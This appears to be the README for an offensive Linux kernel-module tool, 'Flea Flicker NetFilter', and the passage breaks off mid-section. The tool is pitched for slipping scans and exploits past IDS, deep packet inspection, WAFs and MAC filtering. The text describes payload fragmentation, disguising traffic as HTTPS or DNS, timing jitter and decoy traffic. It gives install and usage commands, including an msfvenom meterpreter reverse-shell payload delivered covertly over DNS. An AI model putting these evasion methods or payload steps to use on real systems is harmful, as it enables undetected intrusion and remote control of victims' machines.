Flea Flicker NetFilter
IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing. Your pentest is over before it starts.
Flea Flicker manipulates packets at kernel levelâbefore they hit the network, before IDS sees them. Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic looks legitimate. IDS sees nothing suspicious. Manual control over packet behavior. Not automated evasion. Not script kiddie tools.
What It Does
Deep Packet Inspection Evasion
IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads. Flea Flicker fragments your attack across multiple packets: encrypt at the application layer before the network layer, insert random padding between fragments, reassemble only at destination.
Normal Metasploit payload:
[TCP Header][Exploit Code]
â IDS sees exploit signature, blocks
Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
â IDS sees incomplete fragments, allows
â Target reassembles into exploit
Protocol Impersonation
Unusual protocols get flagged. Port scans detected immediately. Make attack traffic look like legitimate services.
Nmap scan on port 445:
â SMB enumeration detected, blocked
Flea Flicker wrapped Nmap:
â Packets look like HTTPS traffic on 443
â Payload hidden in TLS-like structure
â IDS sees "normal web browsing"
â Scan proceeds undetected
Timing Randomization
Behavioral analysis detects patterns. Regular intervals mean automated scanning. You get caught. Flea Flicker randomizes delays between packets (0.1s to 5s), injects jitter to mimic human interaction, and throttles volume to stay under detection thresholds. This defeats time-series analysis, rate limiting, and correlation engines that break on temporal clustering.
MAC Address Rotation
Network access control, MAC filtering, device trackingâthey know your hardware. Flea Flicker rotates MAC every N packets, spoofs the vendor OUI to look like different hardware, and maintains DHCP lease across rotations. Use case: bypass MAC filtering on WiFi networks during authorized pentest.
Traffic Mimicry
Volume analysis spots anomalies. Attack traffic does not look like normal users. Hide in normal traffic by generating decoy traffic alongside real attacks, matching volume patterns to office hours and usage spikes, and mixing protocols (HTTP, DNS, SMTP). The real attack disappears into noise that looks like a normal user.
Technical Implementation
// Intercept outbound packets
nf_register_hook(&nfho_out, PF_INET, NF_INET_POST_ROUTING,
packet_handler, NF_IP_PRI_FIRST);
// Modify before sending
unsigned int packet_handler(void *priv, struct sk_buff *skb, ...) {
// Fragment payload
// Add encryption layer
// Inject timing delays
// Spoof headers
return NF_ACCEPT; // Send modified packet
}
[Application] â [Payload]
â
[Flea Flicker Interceptor]
â
[Fragment + Encrypt + Obfuscate + Time Delay]
â
[Modified Packets] â [Network]
Real-World Scenario
Objective: enumerate SMB shares on a corporate network with IDS deployed.
Without Flea Flicker:
$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
â IDS detects: Port scan + SMB enumeration
â Alert triggered
â IP blocked
â Pentest detected
With Flea Flicker:
$ flea-flicker --mode ghost --protocol https \
nmap -p 445 --script smb-enum-shares 10.0.0.0/24
â Packets fragmented across 20-second window
â Traffic appears as HTTPS on port 443
â Timing randomized (looks like browsing)
â IDS sees: Normal web traffic
â Scan completes undetected
â Pentest proceeds
Pentest Integration
Metasploit payload wrapping:
# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin
# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
--protocol dns --fragment-size 64 --delay 0.5-3.0
# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes
Burp Suite extension:
[Burp Repeater]
â
[Flea Flicker Proxy]
â
[Obfuscated HTTP requests]
â
[Target Web App]
WAF sees fragmented, time-delayed requests
Attack succeeds where direct request blocked
Nmap evasion:
# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com
# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
nmap -A -T2 target.com
Installation
git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter
sudo ./install.sh
sudo modprobe flea_flicker
flea-flicker --version
Requires Linux kernel 4.15+ with netfilter support, root access for kernel module loading, and Python 3.8+. Compatible with Kali, ParrotOS, Ubuntu, Debian.
Basic Usage
Ghost Mode (DPI evasion):